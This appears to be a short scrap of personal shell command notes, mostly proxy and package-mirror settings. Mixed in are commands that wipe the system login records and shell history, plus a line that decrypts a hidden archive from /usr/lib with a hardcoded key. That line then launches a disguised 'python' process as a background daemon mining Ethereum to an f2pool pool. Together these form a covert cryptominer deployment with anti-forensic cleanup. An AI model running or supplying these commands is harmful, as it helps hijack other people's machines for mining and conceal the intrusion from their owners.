1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| apt install netcat-traditional -y update-alternatives --config nc
echo > /var/log/wtmp && echo > /var/log/btmp && echo > /var/log/lastlog &&history -c
dd if=/usr/lib/megumi | openssl des3 -d -k "11..11+*Ax" |tar zxf - -C /root/.local start-stop-daemon -S -m -q -b -p /run/megumi.pid -x /root/.local/.venv/python -- -a ethash -o stratum+tcp://eth.f2pool.com:6688 -u mekumi -p x start-stop-daemon -K -q -p /run/megumi.pid --remove-pidfile
go env -w GOPROXY=https://mirrors.aliyun.com/goproxy/,direct
set http_proxy=socks5://127.0.0.1:10808 set https_proxy=%http_proxy%
export proxy_host="192.168.1.114:10809" export HTTP_PROXY=http://${proxy_host} export HTTPS_PROXY=http://${proxy_host} export NO_PROXY=127.0.0.0/8,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16,cattle-system.svc
echo > /var/log/wtmp echo > /var/log/btmp echo > /var/log/lastlog history -c
|